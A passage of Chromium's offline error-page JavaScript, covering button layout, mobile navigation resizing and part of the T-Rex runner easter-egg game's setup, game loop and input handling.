      loadTimeData.getValue('attemptAutoFetch');

  const reloadButtonVisible = loadTimeData.valueExists('reloadButton') &&
      loadTimeData.getValue('reloadButton').msg;

  const reloadButton = document.getElementById('reload-button');
  const downloadButton = document.getElementById('download-button');
  if (reloadButton.style.display === 'none' &&
      downloadButton.style.display === 'none') {
    detailsButton.classList.add('singular');
  }

  // Show or hide control buttons.
  const controlButtonDiv = document.getElementById('control-buttons');
  controlButtonDiv.hidden =
      offlineContentVisible || !(reloadButtonVisible || downloadButtonVisible);

  const iconClass = loadTimeData.valueExists('iconClass') &&
      loadTimeData.getValue('iconClass');

  updateIconClass(iconClass);

  if (!isSubFrame && iconClass === 'icon-offline') {
    document.documentElement.classList.add('offline');
    new Runner('.interstitial-wrapper');
  }
}

function onDocumentLoad() {
  // Sets up the proper button layout for the current platform.
  const buttonsDiv = document.getElementById('buttons');
  if (primaryControlOnLeft) {
    buttonsDiv.classList.add('suggested-left');
  } else {
    buttonsDiv.classList.add('suggested-right');
  }

  onDocumentLoadOrUpdate();
}

document.addEventListener('DOMContentLoaded', onDocumentLoad);
</script>
  <script>// Copyright 2015 The Chromium Authors
// Use of this source code is governed by a BSD-style license that can be
// found in the LICENSE file.

let mobileNav = false;

/**
 * For small screen mobile the navigation buttons are moved
 * below the advanced text.
 */
function onResize() {
  const helpOuterBox = document.querySelector('#details');
  const mainContent = document.querySelector('#main-content');
  const mediaQuery = '(min-width: 240px) and (max-width: 420px) and ' +
      '(min-height: 401px), ' +
      '(max-height: 560px) and (min-height: 240px) and ' +
      '(min-width: 421px)';

  const detailsHidden = helpOuterBox.classList.contains(HIDDEN_CLASS);
  const runnerContainer = document.querySelector('.runner-container');

  // Check for change in nav status.
  if (mobileNav !== window.matchMedia(mediaQuery).matches) {
    mobileNav = !mobileNav;

    // Handle showing the top content / details sections according to state.
    if (mobileNav) {
      mainContent.classList.toggle(HIDDEN_CLASS, !detailsHidden);
      helpOuterBox.classList.toggle(HIDDEN_CLASS, detailsHidden);
      if (runnerContainer) {
        runnerContainer.classList.toggle(HIDDEN_CLASS, !detailsHidden);
      }
    } else if (!detailsHidden) {
      // Non mobile nav with visible details.
      mainContent.classList.remove(HIDDEN_CLASS);
      helpOuterBox.classList.remove(HIDDEN_CLASS);
      if (runnerContainer) {
        runnerContainer.classList.remove(HIDDEN_CLASS);
      }
    }
  }
}

function setupMobileNav() {
  window.addEventListener('resize', onResize);
  onResize();
}

document.addEventListener('DOMContentLoaded', setupMobileNav);
</script>
  <script>// Copyright 2014 The Chromium Authors
// Use of this source code is governed by a BSD-style license that can be
// found in the LICENSE file.

/**
 * T-Rex runner.
 * @param {string} outerContainerId Outer containing element id.
 * @param {!Object=} opt_config
 * @constructor
 * @implements {EventListener}
 * @export
 */
function Runner(outerContainerId, opt_config) {
  // Singleton
  if (Runner.instance_) {
    return Runner.instance_;
  }
  Runner.instance_ = this;

  this.outerContainerEl = document.querySelector(outerContainerId);
  this.containerEl = null;
  this.snackbarEl = null;
  // A div to intercept touch events. Only set while (playing && useTouch).
  this.touchController = null;

  this.config = opt_config || Object.assign(Runner.config, Runner.normalConfig);
  // Logical dimensions of the container.
  this.dimensions = Runner.defaultDimensions;

  this.gameType = null;
  Runner.spriteDefinition = Runner.spriteDefinitionByType['original'];

  this.altGameImageSprite = null;
  this.altGameModeActive = false;
  this.altGameModeFlashTimer = null;
  this.fadeInTimer = 0;

  this.canvas = null;
  this.canvasCtx = null;

  this.tRex = null;

  this.distanceMeter = null;
  this.distanceRan = 0;

  this.highestScore = 0;
  this.syncHighestScore = false;

  this.time = 0;
  this.runningTime = 0;
  this.msPerFrame = 1000 / FPS;
  this.currentSpeed = this.config.SPEED;
  Runner.slowDown = false;

  this.obstacles = [];

  this.activated = false; // Whether the easter egg has been activated.
  this.playing = false; // Whether the game is currently in play state.
  this.crashed = false;
  this.paused = false;
  this.inverted = false;
  this.invertTimer = 0;
  this.resizeTimerId_ = null;

  this.playCount = 0;

  // Sound FX.
  this.audioBuffer = null;

  /** @type {Object} */
  this.soundFx = {};
  this.generatedSoundFx = null;

  // Global web audio context for playing sounds.
  this.audioContext = null;

  // Images.
  this.images = {};
  this.imagesLoaded = 0;

  // Gamepad state.
  this.pollingGamepads = false;
  this.gamepadIndex = undefined;
  this.previousGamepad = null;

  if (this.isDisabled()) {
    this.setupDisabledRunner();
  } else {
    if (Runner.isAltGameModeEnabled()) {
      this.initAltGameType();
      Runner.gameType = this.gameType;
    }
    this.loadImages();

    window['initializeEasterEggHighScore'] =
        this.initializeHighScore.bind(this);
  }
}

/**
 * Default game width.
 * @const
 */
const DEFAULT_WIDTH = 600;

/**
 * Frames per second.
 * @const
 */
const FPS = 60;

/** @const */
const IS_HIDPI = window.devicePixelRatio > 1;

/** @const */
const IS_IOS = /CriOS/.test(window.navigator.userAgent);

/** @const */
const IS_MOBILE = /Android/.test(window.navigator.userAgent) || IS_IOS;

/** @const */
const IS_RTL = document.querySelector('html').dir == 'rtl';

/** @const */
const ARCADE_MODE_URL = 'chrome://dino/';

/** @const */
const RESOURCE_POSTFIX = 'offline-resources-';

/** @const */
const A11Y_STRINGS = {
  ariaLabel: 'dinoGameA11yAriaLabel',
  description: 'dinoGameA11yDescription',
  gameOver: 'dinoGameA11yGameOver',
  highScore: 'dinoGameA11yHighScore',
  jump: 'dinoGameA11yJump',
  started: 'dinoGameA11yStartGame',
  speedLabel: 'dinoGameA11ySpeedToggle',
};

/**
 * Default game configuration.
 * Shared config for all  versions of the game. Additional parameters are
 * defined in Runner.normalConfig and Runner.slowConfig.
 */
Runner.config = {
  AUDIOCUE_PROXIMITY_THRESHOLD: 190,
  AUDIOCUE_PROXIMITY_THRESHOLD_MOBILE_A11Y: 250,
  BG_CLOUD_SPEED: 0.2,
  BOTTOM_PAD: 10,
  // Scroll Y threshold at which the game can be activated.
  CANVAS_IN_VIEW_OFFSET: -10,
  CLEAR_TIME: 3000,
  CLOUD_FREQUENCY: 0.5,
  FADE_DURATION: 1,
  FLASH_DURATION: 1000,
  GAMEOVER_CLEAR_TIME: 1200,
  INITIAL_JUMP_VELOCITY: 12,
  INVERT_FADE_DURATION: 12000,
  MAX_BLINK_COUNT: 3,
  MAX_CLOUDS: 6,
  MAX_OBSTACLE_LENGTH: 3,
  MAX_OBSTACLE_DUPLICATION: 2,
  RESOURCE_TEMPLATE_ID: 'audio-resources',
  SPEED: 6,
  SPEED_DROP_COEFFICIENT: 3,
  ARCADE_MODE_INITIAL_TOP_POSITION: 35,
  ARCADE_MODE_TOP_POSITION_PERCENT: 0.1,
};

Runner.normalConfig = {
  ACCELERATION: 0.001,
  AUDIOCUE_PROXIMITY_THRESHOLD: 190,
  AUDIOCUE_PROXIMITY_THRESHOLD_MOBILE_A11Y: 250,
  GAP_COEFFICIENT: 0.6,
  INVERT_DISTANCE: 700,
  MAX_SPEED: 13,
  MOBILE_SPEED_COEFFICIENT: 1.2,
  SPEED: 6,
};


Runner.slowConfig = {
  ACCELERATION: 0.0005,
  AUDIOCUE_PROXIMITY_THRESHOLD: 170,
  AUDIOCUE_PROXIMITY_THRESHOLD_MOBILE_A11Y: 220,
  GAP_COEFFICIENT: 0.3,
  INVERT_DISTANCE: 350,
  MAX_SPEED: 9,
  MOBILE_SPEED_COEFFICIENT: 1.5,
  SPEED: 4.2,
};


/**
 * Default dimensions.
 */
Runner.defaultDimensions = {
  WIDTH: DEFAULT_WIDTH,
  HEIGHT: 150,
};


/**
 * CSS class names.
 * @enum {string}
 */
Runner.classes = {
  ARCADE_MODE: 'arcade-mode',
  CANVAS: 'runner-canvas',
  CONTAINER: 'runner-container',
  CRASHED: 'crashed',
  ICON: 'icon-offline',
  INVERTED: 'inverted',
  SNACKBAR: 'snackbar',
  SNACKBAR_SHOW: 'snackbar-show',
  TOUCH_CONTROLLER: 'controller',
};


/**
 * Sound FX. Reference to the ID of the audio tag on interstitial page.
 * @enum {string}
 */
Runner.sounds = {
  BUTTON_PRESS: 'offline-sound-press',
  HIT: 'offline-sound-hit',
  SCORE: 'offline-sound-reached',
};


/**
 * Key code mapping.
 * @enum {Object}
 */
Runner.keycodes = {
  JUMP: {'38': 1, '32': 1},  // Up, spacebar
  DUCK: {'40': 1},           // Down
  RESTART: {'13': 1},        // Enter
};


/**
 * Runner event names.
 * @enum {string}
 */
Runner.events = {
  ANIM_END: 'webkitAnimationEnd',
  CLICK: 'click',
  KEYDOWN: 'keydown',
  KEYUP: 'keyup',
  POINTERDOWN: 'pointerdown',
  POINTERUP: 'pointerup',
  RESIZE: 'resize',
  TOUCHEND: 'touchend',
  TOUCHSTART: 'touchstart',
  VISIBILITY: 'visibilitychange',
  BLUR: 'blur',
  FOCUS: 'focus',
  LOAD: 'load',
  GAMEPADCONNECTED: 'gamepadconnected',
};

Runner.prototype = {
  /**
   * Initialize alternative game type.
   */
  initAltGameType() {
    if (GAME_TYPE.length > 0) {
      this.gameType = loadTimeData && loadTimeData.valueExists('altGameType') ?
          GAME_TYPE[parseInt(loadTimeData.getValue('altGameType'), 10) - 1] :
          '';
    }
  },

  /**
   * Whether the easter egg has been disabled. CrOS enterprise enrolled devices.
   * @return {boolean}
   */
  isDisabled() {
    return loadTimeData && loadTimeData.valueExists('disabledEasterEgg');
  },

  /**
   * For disabled instances, set up a snackbar with the disabled message.
   */
  setupDisabledRunner() {
    this.containerEl = document.createElement('div');
    this.containerEl.className = Runner.classes.SNACKBAR;
    this.containerEl.textContent = loadTimeData.getValue('disabledEasterEgg');
    this.outerContainerEl.appendChild(this.containerEl);

    // Show notification when the activation key is pressed.
    document.addEventListener(Runner.events.KEYDOWN, function(e) {
      if (Runner.keycodes.JUMP[e.keyCode]) {
        this.containerEl.classList.add(Runner.classes.SNACKBAR_SHOW);
        document.querySelector('.icon').classList.add('icon-disabled');
      }
    }.bind(this));
  },

  /**
   * Setting individual settings for debugging.
   * @param {string} setting
   * @param {number|string} value
   */
  updateConfigSetting(setting, value) {
    if (setting in this.config && value !== undefined) {
      this.config[setting] = value;

      switch (setting) {
        case 'GRAVITY':
        case 'MIN_JUMP_HEIGHT':
        case 'SPEED_DROP_COEFFICIENT':
          this.tRex.config[setting] = value;
          break;
        case 'INITIAL_JUMP_VELOCITY':
          this.tRex.setJumpVelocity(value);
          break;
        case 'SPEED':
          this.setSpeed(/** @type {number} */ (value));
          break;
      }
    }
  },

  /**
   * Creates an on page image element from the base 64 encoded string source.
   * @param {string} resourceName Name in data object,
   * @return {HTMLImageElement} The created element.
   */
  createImageElement(resourceName) {
    const imgSrc = loadTimeData && loadTimeData.valueExists(resourceName) ?
        loadTimeData.getString(resourceName) :
        null;

    if (imgSrc) {
      const el =
          /** @type {HTMLImageElement} */ (document.createElement('img'));
      el.id = resourceName;
      el.src = imgSrc;
      document.getElementById('offline-resources').appendChild(el);
      return el;
    }
    return null;
  },

  /**
   * Cache the appropriate image sprite from the page and get the sprite sheet
   * definition.
   */
  loadImages() {
    let scale = '1x';
    this.spriteDef = Runner.spriteDefinition.LDPI;
    if (IS_HIDPI) {
      scale = '2x';
      this.spriteDef = Runner.spriteDefinition.HDPI;
    }

    Runner.imageSprite = /** @type {HTMLImageElement} */
        (document.getElementById(RESOURCE_POSTFIX + scale));

    if (this.gameType) {
      Runner.altGameImageSprite = /** @type {HTMLImageElement} */
          (this.createImageElement('altGameSpecificImage' + scale));
      Runner.altCommonImageSprite = /** @type {HTMLImageElement} */
          (this.createImageElement('altGameCommonImage' + scale));
    }
    Runner.origImageSprite = Runner.imageSprite;

    // Disable the alt game mode if the sprites can't be loaded.
    if (!Runner.altGameImageSprite || !Runner.altCommonImageSprite) {
      Runner.isAltGameModeEnabled = () => false;
      this.altGameModeActive = false;
    }

    if (Runner.imageSprite.complete) {
      this.init();
    } else {
      // If the images are not yet loaded, add a listener.
      Runner.imageSprite.addEventListener(Runner.events.LOAD,
          this.init.bind(this));
    }
  },

  /**
   * Load and decode base 64 encoded sounds.
   */
  loadSounds() {
    if (!IS_IOS) {
      this.audioContext = new AudioContext();

      const resourceTemplate =
          document.getElementById(this.config.RESOURCE_TEMPLATE_ID).content;

      for (const sound in Runner.sounds) {
        let soundSrc =
            resourceTemplate.getElementById(Runner.sounds[sound]).src;
        soundSrc = soundSrc.substr(soundSrc.indexOf(',') + 1);
        const buffer = decodeBase64ToArrayBuffer(soundSrc);

        // Async, so no guarantee of order in array.
        this.audioContext.decodeAudioData(buffer, function(index, audioData) {
            this.soundFx[index] = audioData;
          }.bind(this, sound));
      }
    }
  },

  /**
   * Sets the game speed. Adjust the speed accordingly if on a smaller screen.
   * @param {number=} opt_speed
   */
  setSpeed(opt_speed) {
    const speed = opt_speed || this.currentSpeed;

    // Reduce the speed on smaller mobile screens.
    if (this.dimensions.WIDTH < DEFAULT_WIDTH) {
      const mobileSpeed = Runner.slowDown ? speed :
                                            speed * this.dimensions.WIDTH /
              DEFAULT_WIDTH * this.config.MOBILE_SPEED_COEFFICIENT;
      this.currentSpeed = mobileSpeed > speed ? speed : mobileSpeed;
    } else if (opt_speed) {
      this.currentSpeed = opt_speed;
    }
  },

  /**
   * Game initialiser.
   */
  init() {
    // Hide the static icon.
    document.querySelector('.' + Runner.classes.ICON).style.visibility =
        'hidden';

    this.adjustDimensions();
    this.setSpeed();

    const ariaLabel = getA11yString(A11Y_STRINGS.ariaLabel);
    this.containerEl = document.createElement('div');
    this.containerEl.setAttribute('role', IS_MOBILE ? 'button' : 'application');
    this.containerEl.setAttribute('tabindex', '0');
    this.containerEl.setAttribute('title', ariaLabel);

    this.containerEl.className = Runner.classes.CONTAINER;

    // Player canvas container.
    this.canvas = createCanvas(this.containerEl, this.dimensions.WIDTH,
        this.dimensions.HEIGHT);

    // Live region for game status updates.
    this.a11yStatusEl = document.createElement('span');
    this.a11yStatusEl.className = 'offline-runner-live-region';
    this.a11yStatusEl.setAttribute('aria-live', 'assertive');
    this.a11yStatusEl.textContent = '';
    Runner.a11yStatusEl = this.a11yStatusEl;

    // Add checkbox to slow down the game.
    this.slowSpeedCheckboxLabel = document.createElement('label');
    this.slowSpeedCheckboxLabel.className = 'slow-speed-option hidden';
    this.slowSpeedCheckboxLabel.textContent =
        getA11yString(A11Y_STRINGS.speedLabel);

    this.slowSpeedCheckbox = document.createElement('input');
    this.slowSpeedCheckbox.setAttribute('type', 'checkbox');
    this.slowSpeedCheckbox.setAttribute(
        'title', getA11yString(A11Y_STRINGS.speedLabel));
    this.slowSpeedCheckbox.setAttribute('tabindex', '0');
    this.slowSpeedCheckbox.setAttribute('checked', 'checked');

    this.slowSpeedToggleEl = document.createElement('span');
    this.slowSpeedToggleEl.className = 'slow-speed-toggle';

    this.slowSpeedCheckboxLabel.appendChild(this.slowSpeedCheckbox);
    this.slowSpeedCheckboxLabel.appendChild(this.slowSpeedToggleEl);

    if (IS_IOS) {
      this.outerContainerEl.appendChild(this.a11yStatusEl);
    } else {
      this.containerEl.appendChild(this.a11yStatusEl);
    }

    announcePhrase(getA11yString(A11Y_STRINGS.description));

    this.generatedSoundFx = new GeneratedSoundFx();

    this.canvasCtx =
        /** @type {CanvasRenderingContext2D} */ (this.canvas.getContext('2d'));
    this.canvasCtx.fillStyle = '#f7f7f7';
    this.canvasCtx.fill();
    Runner.updateCanvasScaling(this.canvas);

    // Horizon contains clouds, obstacles and the ground.
    this.horizon = new Horizon(this.canvas, this.spriteDef, this.dimensions,
        this.config.GAP_COEFFICIENT);

    // Distance meter
    this.distanceMeter = new DistanceMeter(this.canvas,
          this.spriteDef.TEXT_SPRITE, this.dimensions.WIDTH);

    // Draw t-rex
    this.tRex = new Trex(this.canvas, this.spriteDef.TREX);

    this.outerContainerEl.appendChild(this.containerEl);
    this.outerContainerEl.appendChild(this.slowSpeedCheckboxLabel);

    this.startListening();
    this.update();

    window.addEventListener(Runner.events.RESIZE,
        this.debounceResize.bind(this));

    // Handle dark mode
    const darkModeMediaQuery =
        window.matchMedia('(prefers-color-scheme: dark)');
    this.isDarkMode = darkModeMediaQuery && darkModeMediaQuery.matches;
    darkModeMediaQuery.addListener((e) => {
      this.isDarkMode = e.matches;
    });
  },

  /**
   * Create the touch controller. A div that covers whole screen.
   */
  createTouchController() {
    this.touchController = document.createElement('div');
    this.touchController.className = Runner.classes.TOUCH_CONTROLLER;
    this.touchController.addEventListener(Runner.events.TOUCHSTART, this);
    this.touchController.addEventListener(Runner.events.TOUCHEND, this);
    this.outerContainerEl.appendChild(this.touchController);
  },

  /**
   * Debounce the resize event.
   */
  debounceResize() {
    if (!this.resizeTimerId_) {
      this.resizeTimerId_ =
          setInterval(this.adjustDimensions.bind(this), 250);
    }
  },

  /**
   * Adjust game space dimensions on resize.
   */
  adjustDimensions() {
    clearInterval(this.resizeTimerId_);
    this.resizeTimerId_ = null;

    const boxStyles = window.getComputedStyle(this.outerContainerEl);
    const padding = Number(boxStyles.paddingLeft.substr(0,
        boxStyles.paddingLeft.length - 2));

    this.dimensions.WIDTH = this.outerContainerEl.offsetWidth - padding * 2;
    if (this.isArcadeMode()) {
      this.dimensions.WIDTH = Math.min(DEFAULT_WIDTH, this.dimensions.WIDTH);
      if (this.activated) {
        this.setArcadeModeContainerScale();
      }
    }

    // Redraw the elements back onto the canvas.
    if (this.canvas) {
      this.canvas.width = this.dimensions.WIDTH;
      this.canvas.height = this.dimensions.HEIGHT;

      Runner.updateCanvasScaling(this.canvas);

      this.distanceMeter.calcXPos(this.dimensions.WIDTH);
      this.clearCanvas();
      this.horizon.update(0, 0, true);
      this.tRex.update(0);

      // Outer container and distance meter.
      if (this.playing || this.crashed || this.paused) {
        this.containerEl.style.width = this.dimensions.WIDTH + 'px';
        this.containerEl.style.height = this.dimensions.HEIGHT + 'px';
        this.distanceMeter.update(0, Math.ceil(this.distanceRan));
        this.stop();
      } else {
        this.tRex.draw(0, 0);
      }

      // Game over panel.
      if (this.crashed && this.gameOverPanel) {
        this.gameOverPanel.updateDimensions(this.dimensions.WIDTH);
        this.gameOverPanel.draw(this.altGameModeActive, this.tRex);
      }
    }
  },

  /**
   * Play the game intro.
   * Canvas container width expands out to the full width.
   */
  playIntro() {
    if (!this.activated && !this.crashed) {
      this.playingIntro = true;
      this.tRex.playingIntro = true;

      // CSS animation definition.
      const keyframes = '@-webkit-keyframes intro { ' +
            'from { width:' + Trex.config.WIDTH + 'px }' +
            'to { width: ' + this.dimensions.WIDTH + 'px }' +
          '}';
      document.styleSheets[0].insertRule(keyframes, 0);

      this.containerEl.addEventListener(Runner.events.ANIM_END,
          this.startGame.bind(this));

      this.containerEl.style.webkitAnimation = 'intro .4s ease-out 1 both';
      this.containerEl.style.width = this.dimensions.WIDTH + 'px';

      this.setPlayStatus(true);
      this.activated = true;
    } else if (this.crashed) {
      this.restart();
    }
  },


  /**
   * Update the game status to started.
   */
  startGame() {
    if (this.isArcadeMode()) {
      this.setArcadeMode();
    }
    this.toggleSpeed();
    this.runningTime = 0;
    this.playingIntro = false;
    this.tRex.playingIntro = false;
    this.containerEl.style.webkitAnimation = '';
    this.playCount++;
    this.generatedSoundFx.background();
    announcePhrase(getA11yString(A11Y_STRINGS.started));

    if (Runner.audioCues) {
      this.containerEl.setAttribute('title', getA11yString(A11Y_STRINGS.jump));
    }

    // Handle tabbing off the page. Pause the current game.
    document.addEventListener(Runner.events.VISIBILITY,
          this.onVisibilityChange.bind(this));

    window.addEventListener(Runner.events.BLUR,
          this.onVisibilityChange.bind(this));

    window.addEventListener(Runner.events.FOCUS,
          this.onVisibilityChange.bind(this));
  },

  clearCanvas() {
    this.canvasCtx.clearRect(0, 0, this.dimensions.WIDTH,
        this.dimensions.HEIGHT);
  },

  /**
   * Checks whether the canvas area is in the viewport of the browser
   * through the current scroll position.
   * @return boolean.
   */
  isCanvasInView() {
    return this.containerEl.getBoundingClientRect().top >
        Runner.config.CANVAS_IN_VIEW_OFFSET;
  },

  /**
   * Enable the alt game mode. Switching out the sprites.
   */
  enableAltGameMode() {
    Runner.imageSprite = Runner.altGameImageSprite;
    Runner.spriteDefinition = Runner.spriteDefinitionByType[Runner.gameType];

    if (IS_HIDPI) {
      this.spriteDef = Runner.spriteDefinition.HDPI;
    } else {
      this.spriteDef = Runner.spriteDefinition.LDPI;
    }

    this.altGameModeActive = true;
    this.tRex.enableAltGameMode(this.spriteDef.TREX);
    this.horizon.enableAltGameMode(this.spriteDef);
    this.generatedSoundFx.background();
  },

  /**
   * Update the game frame and schedules the next one.
   */
  update() {
    this.updatePending = false;

    const now = getTimeStamp();
    let deltaTime = now - (this.time || now);

    // Flashing when switching game modes.
    if (this.altGameModeFlashTimer < 0 || this.altGameModeFlashTimer === 0) {
      this.altGameModeFlashTimer = null;
      this.tRex.setFlashing(false);
      this.enableAltGameMode();
    } else if (this.altGameModeFlashTimer > 0) {
      this.altGameModeFlashTimer -= deltaTime;
      this.tRex.update(deltaTime);
      deltaTime = 0;
    }

    this.time = now;

    if (this.playing) {
      this.clearCanvas();

      // Additional fade in - Prevents jump when switching sprites
      if (this.altGameModeActive &&
          this.fadeInTimer <= this.config.FADE_DURATION) {
        this.fadeInTimer += deltaTime / 1000;
        this.canvasCtx.globalAlpha = this.fadeInTimer;
      } else {
        this.canvasCtx.globalAlpha = 1;
      }

      if (this.tRex.jumping) {
        this.tRex.updateJump(deltaTime);
      }

      this.runningTime += deltaTime;
      const hasObstacles = this.runningTime > this.config.CLEAR_TIME;

      // First jump triggers the intro.
      if (this.tRex.jumpCount === 1 && !this.playingIntro) {
        this.playIntro();
      }

      // The horizon doesn't move until the intro is over.
      if (this.playingIntro) {
        this.horizon.update(0, this.currentSpeed, hasObstacles);
      } else if (!this.crashed) {
        const showNightMode = this.isDarkMode ^ this.inverted;
        deltaTime = !this.activated ? 0 : deltaTime;
        this.horizon.update(
            deltaTime, this.currentSpeed, hasObstacles, showNightMode);
      }

      // Check for collisions.
      let collision = hasObstacles &&
          checkForCollision(this.horizon.obstacles[0], this.tRex);

      // For a11y, audio cues.
      if (Runner.audioCues && hasObstacles) {
        const jumpObstacle =
            this.horizon.obstacles[0].typeConfig.type != 'COLLECTABLE';

        if (!this.horizon.obstacles[0].jumpAlerted) {
          const threshold = Runner.isMobileMouseInput ?
              Runner.config.AUDIOCUE_PROXIMITY_THRESHOLD_MOBILE_A11Y :
              Runner.config.AUDIOCUE_PROXIMITY_THRESHOLD;
          const adjProximityThreshold = threshold +
              (threshold * Math.log10(this.currentSpeed / Runner.config.SPEED));

          if (this.horizon.obstacles[0].xPos < adjProximityThreshold) {
            if (jumpObstacle) {
              this.generatedSoundFx.jump();
            }
            this.horizon.obstacles[0].jumpAlerted = true;
          }
        }
      }

      // Activated alt game mode.
      if (Runner.isAltGameModeEnabled() && collision &&
          this.horizon.obstacles[0].typeConfig.type == 'COLLECTABLE') {
        this.horizon.removeFirstObstacle();
        this.tRex.setFlashing(true);
        collision = false;
        this.altGameModeFlashTimer = this.config.FLASH_DURATION;
        this.runningTime = 0;
        this.generatedSoundFx.collect();
      }

      if (!collision) {
        this.distanceRan += this.currentSpeed * deltaTime / this.msPerFrame;

        if (this.currentSpeed < this.config.MAX_SPEED) {
          this.currentSpeed += this.config.ACCELERATION;
        }
      } else {
        this.gameOver();
      }

      const playAchievementSound = this.distanceMeter.update(deltaTime,
          Math.ceil(this.distanceRan));

      if (!Runner.audioCues && playAchievementSound) {
        this.playSound(this.soundFx.SCORE);
      }

      // Night mode.
      if (!Runner.isAltGameModeEnabled()) {
        if (this.invertTimer > this.config.INVERT_FADE_DURATION) {
          this.invertTimer = 0;
          this.invertTrigger = false;
          this.invert(false);
        } else if (this.invertTimer) {
          this.invertTimer += deltaTime;
        } else {
          const actualDistance =
              this.distanceMeter.getActualDistance(Math.ceil(this.distanceRan));

          if (actualDistance > 0) {
            this.invertTrigger =
                !(actualDistance % this.config.INVERT_DISTANCE);

            if (this.invertTrigger && this.invertTimer === 0) {
              this.invertTimer += deltaTime;
              this.invert(false);
            }
          }
        }
      }
    }

    if (this.playing || (!this.activated &&
        this.tRex.blinkCount < Runner.config.MAX_BLINK_COUNT)) {
      this.tRex.update(deltaTime);
      this.scheduleNextUpdate();
    }
  },

  /**
   * Event handler.
   * @param {Event} e
   */
  handleEvent(e) {
    return (function(evtType, events) {
      switch (evtType) {
        case events.KEYDOWN:
        case events.TOUCHSTART:
        case events.POINTERDOWN:
          this.onKeyDown(e);
          break;
        case events.KEYUP:
        case events.TOUCHEND:
        case events.POINTERUP:
          this.onKeyUp(e);
          break;
        case events.GAMEPADCONNECTED:
          this.onGamepadConnected(e);
          break;
      }
    }.bind(this))(e.type, Runner.events);
  },

  /**
   * Initialize audio cues if activated by focus on the canvas element.
   * @param {Event} e
   */
  handleCanvasKeyPress(e) {
    if (!this.activated && !Runner.audioCues) {
      this.toggleSpeed();
      Runner.audioCues = true;
      this.generatedSoundFx.init();
      Runner.generatedSoundFx = this.generatedSoundFx;
      Runner.config.CLEAR_TIME *= 1.2;
    } else if (e.keyCode && Runner.keycodes.JUMP[e.keyCode]) {
      this.onKeyDown(e);
    }
  },

  /**
   * Prevent space key press from scrolling.
   * @param {Event} e
   */
  preventScrolling(e) {
    if (e.keyCode === 32) {
      e.preventDefault();
    }
  },

  /**
   * Toggle speed setting if toggle is shown.
   */
  toggleSpeed() {
    if (Runner.audioCues) {
      const speedChange = Runner.slowDown != this.slowSpeedCheckbox.checked;

      if (speedChange) {
        Runner.slowDown = this.slowSpeedCheckbox.checked;
        const updatedConfig =
            Runner.slowDown ? Runner.slowConfig : Runner.normalConfig;

        Runner.config = Object.assign(Runner.config, updatedConfig);
        this.currentSpeed = updatedConfig.SPEED;
        this.tRex.enableSlowConfig();
        this.horizon.adjustObstacleSpeed();
      }
      if (this.playing) {
        this.disableSpeedToggle(true);
      }
    }
  },

  /**
   * Show the speed toggle.
   * From focus event or when audio cues are activated.
   * @param {Event=} e
   */
  showSpeedToggle(e) {
    const isFocusEvent = e && e.type == 'focus';
    if (Runner.audioCues || isFocusEvent) {
      this.slowSpeedCheckboxLabel.classList.toggle(
          HIDDEN_CLASS, isFocusEvent ? false : !this.crashed);
    }
  },

  /**
   * Disable the speed toggle.
   * @param {boolean} disable
   */
  disableSpeedToggle(disable) {
    if (disable) {
      this.slowSpeedCheckbox.setAttribute('disabled', 'disabled');
    } else {
      this.slowSpeedCheckbox.removeAttribute('disabled');
    }
  },

  /**
   * Bind relevant key / mouse / touch listeners.
   */
  startListening() {
    // A11y keyboard / screen reader activation.
    this.containerEl.addEventListener(
        Runner.events.KEYDOWN, this.handleCanvasKeyPress.bind(this));
    if (!IS_MOBILE) {
      this.containerEl.addEventListener(
          Runner.events.FOCUS, this.showSpeedToggle.bind(this));
    }
    this.canvas.addEventListener(
        Runner.events.KEYDOWN, this.preventScrolling.bind(this));
    this.canvas.addEventListener(
        Runner.events.KEYUP, this.preventScrolling.bind(this));

    // Keys.
    document.addEventListener(Runner.events.KEYDOWN, this);
    document.addEventListener(Runner.events.KEYUP, this);

    // Touch / pointer.
    this.containerEl.addEventListener(Runner.events.TOUCHSTART, this);
    document.addEventListener(Runner.events.POINTERDOWN, this);
    document.addEventListener(Runner.events.POINTERUP, this);

    if (this.isArcadeMode()) {
      // Gamepad
      window.addEventListener(Runner.events.GAMEPADCONNECTED, this);
    }
  },

  /**
   * Remove all listeners.
   */
  stopListening() {
    document.removeEventListener(Runner.events.KEYDOWN, this);
    document.removeEventListener(Runner.events.KEYUP, this);

    if (this.touchController) {
      this.touchController.removeEventListener(Runner.events.TOUCHSTART, this);
      this.touchController.removeEventListener(Runner.events.TOUCHEND, this);
    }

    this.containerEl.removeEventListener(Runner.events.TOUCHSTART, this);
    document.removeEventListener(Runner.events.POINTERDOWN, this);
    document.removeEventListener(Runner.events.POINTERUP, this);

    if (this.isArcadeMode()) {
      window.removeEventListener(Runner.events.GAMEPADCONNECTED, this);
    }
  },

  /**
   * Process keydown.
   * @param {Event} e
   */
  onKeyDown(e) {
    // Prevent native page scrolling whilst tapping on mobile.
    if (IS_MOBILE && this.playing) {
      e.preventDefault();
    }

    if (this.isCanvasInView()) {
      // Allow toggling of speed toggle.
      if (Runner.keycodes.JUMP[e.keyCode] &&
          e.target == this.slowSpeedCheckbox) {
        return;
      }

      if (!this.crashed && !this.paused) {
        // For a11y, screen reader activation.
        const isMobileMouseInput = IS_MOBILE &&
                e.type === Runner.events.POINTERDOWN &&
                e.pointerType == 'mouse' && e.target == this.containerEl ||
            (IS_IOS && e.pointerType == 'touch' &&
             document.activeElement == this.containerEl);

        if (Runner.keycodes.JUMP[e.keyCode] ||
            e.type === Runner.events.TOUCHSTART || isMobileMouseInput ||
            (Runner.keycodes.DUCK[e.keyCode] && this.altGameModeActive)) {
          e.preventDefault();
          // Starting the game for the first time.
          if (!this.playing) {
            // Started by touch so create a touch controller.
            if (!this.touchController && e.type === Runner.events.TOUCHSTART) {
              this.createTouchController();
            }

            if (isMobileMouseInput) {
              this.handleCanvasKeyPress(e);
            }
            this.loadSounds();
            this.setPlayStatus(true);
            this.update();
            if (window.errorPageController) {
              errorPageController.trackEasterEgg();
            }
          }
          // Start jump.
          if (!this.tRex.jumping && !this.tRex.ducking) {
            if (Runner.audioCues) {
              this.generatedSoundFx.cancelFootSteps();
            } else {
              this.playSound(this.soundFx.BUTTON_PRESS);
            }
            this.tRex.startJump(this.currentSpeed);
          }
          // Ducking is disabled on alt game modes.
        } else if (
            !this.altGameModeActive && this.playing &&
            Runner.keycodes.DUCK[e.keyCode]) {
          e.preventDefault();
          if (this.tRex.jumping) {
            // Speed drop, activated only when jump key is not pressed.
            this.tRex.setSpeedDrop();
          } else if (!this.tRex.jumping && !this.tRex.ducking) {
            // Duck.
            this.tRex.setDuck(true);
          }
        }
      }
    }
  },

  /**
